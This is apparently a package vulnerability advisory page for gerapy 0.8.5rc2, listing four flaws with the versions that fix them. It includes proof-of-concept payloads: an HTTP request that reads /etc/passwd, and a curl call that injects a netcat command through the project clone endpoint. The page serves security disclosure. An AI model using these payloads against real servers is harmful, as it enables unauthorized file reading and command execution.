gerapy 0.8.5rc2 vulnerabilities

Known vulnerabilities in the gerapy package. This does not include vulnerabilities belonging to this package’s dependencies.

Vulnerability	Vulnerable Version
M Arbitrary File Read gerapy is a Distributed Crawler Management Framework Based on Scrapy, Scrapyd, Scrapyd-Client, Scrapyd-API, Django and Vue.js. Affected versions of this package are vulnerable to Arbitrary File Read. An authenticated user without permissions can send a specially crafted HTTP POST request to the server hosting `gerapy` in order to retrieve the contents of arbitrary files. ###PoC `POST /api/project/file/read HTTP/1.1 Host: Content-Length: 35 Accept: application/json, text/plain, / Authorization: Token 0fb31a60728efd8e6398349bea36fa7629bd8df0 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Content-Type: application/json;charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6 Connection: close {"path":"/etc/","label":"passwd"}` How to fix Arbitrary File Read? Upgrade `gerapy` to version 0.9.9 or higher.	[,0.9.9)
H Access Restriction Bypass gerapy is a Distributed Crawler Management Framework Based on Scrapy, Scrapyd, Scrapyd-Client, Scrapyd-API, Django and Vue.js. Affected versions of this package are vulnerable to Access Restriction Bypass. An authenticated user can execute arbitrary commands in Gerapy. PoC `$ curl 'http://127.0.0.1:8000/api/project/clone' \ -H 'Accept: application/json, text/plain, /' \ -H 'Content-Type: application/json;charset=UTF-8' \ -H 'Authorization: Token $token' \ --data-raw '{"address":"http;echo hi \| nc 127.0.0.1 7777;"}' $ nc -lvp 7777 hi` How to fix Access Restriction Bypass? Upgrade `gerapy` to version 0.9.9 or higher.	[,0.9.9)
C Arbitrary Code Execution gerapy is a Distributed Crawler Management Framework Based on Scrapy, Scrapyd, Scrapyd-Client, Scrapyd-API, Django and Vue.js. Affected versions of this package are vulnerable to Arbitrary Code Execution via the `project_configure` function, by sending HTTP requests that contains malicious code. Note: CVE-2021-44597 is a duplicate of CVE-2021-43857 How to fix Arbitrary Code Execution? Upgrade `gerapy` to version 0.9.8 or higher.	[,0.9.8)
H Command Injection gerapy is a Distributed Crawler Management Framework Based on Scrapy, Scrapyd, Scrapyd-Client, Scrapyd-API, Django and Vue.js. Affected versions of this package are vulnerable to Command Injection. The input being passed to Popen, via the `project_configure` endpoint, isn’t being sanitized. How to fix Command Injection? Upgrade `gerapy` to version 0.9.3 or higher.	[,0.9.3)

Vulnerability

Vulnerable Version

Arbitrary File Read

gerapy is a Distributed Crawler Management Framework Based on Scrapy, Scrapyd, Scrapyd-Client, Scrapyd-API, Django and Vue.js.

Affected versions of this package are vulnerable to Arbitrary File Read. An authenticated user without permissions can send a specially crafted HTTP POST request to the server hosting gerapy in order to retrieve the contents of arbitrary files.

###PoC

   POST /api/project/file/read HTTP/1.1
   Host:
   Content-Length: 35
   Accept: application/json, text/plain, /
   Authorization: Token 0fb31a60728efd8e6398349bea36fa7629bd8df0
   User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) 
   Chrome/96.0.4664.55 Safari/537.36
   Content-Type: application/json;charset=UTF-8
   Accept-Encoding: gzip, deflate
   Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
   Connection: close

   {"path":"/etc/","label":"passwd"}

How to fix Arbitrary File Read?

Upgrade gerapy to version 0.9.9 or higher.

[,0.9.9)

Access Restriction Bypass

gerapy is a Distributed Crawler Management Framework Based on Scrapy, Scrapyd, Scrapyd-Client, Scrapyd-API, Django and Vue.js.

Affected versions of this package are vulnerable to Access Restriction Bypass. An authenticated user can execute arbitrary commands in Gerapy.

PoC

$ curl 'http://127.0.0.1:8000/api/project/clone' \
  -H 'Accept: application/json, text/plain, */*' \
  -H 'Content-Type: application/json;charset=UTF-8' \  
  -H 'Authorization: Token $token' \
  --data-raw '{"address":"http;echo hi | nc 127.0.0.1 7777;"}'

$ nc -lvp 7777
hi

How to fix Access Restriction Bypass?

Upgrade gerapy to version 0.9.9 or higher.

[,0.9.9)

Arbitrary Code Execution

gerapy is a Distributed Crawler Management Framework Based on Scrapy, Scrapyd, Scrapyd-Client, Scrapyd-API, Django and Vue.js.

Affected versions of this package are vulnerable to Arbitrary Code Execution via the project_configure function, by sending HTTP requests that contains malicious code.

Note: CVE-2021-44597 is a duplicate of CVE-2021-43857

How to fix Arbitrary Code Execution?

Upgrade gerapy to version 0.9.8 or higher.

[,0.9.8)

Command Injection

gerapy is a Distributed Crawler Management Framework Based on Scrapy, Scrapyd, Scrapyd-Client, Scrapyd-API, Django and Vue.js.

Affected versions of this package are vulnerable to Command Injection. The input being passed to Popen, via the project_configure endpoint, isn’t being sanitized.

How to fix Command Injection?

Upgrade gerapy to version 0.9.3 or higher.

[,0.9.3)

gerapy@0.8.5rc2 vulnerabilities

Distributed Crawler Management Framework Based on Scrapy, Scrapyd, Scrapyd-Client, Scrapyd-API, Django and Vue.js.

latest version

latest non vulnerable version

first published

latest version published

licenses detected

Direct Vulnerabilities

How to fix?

PoC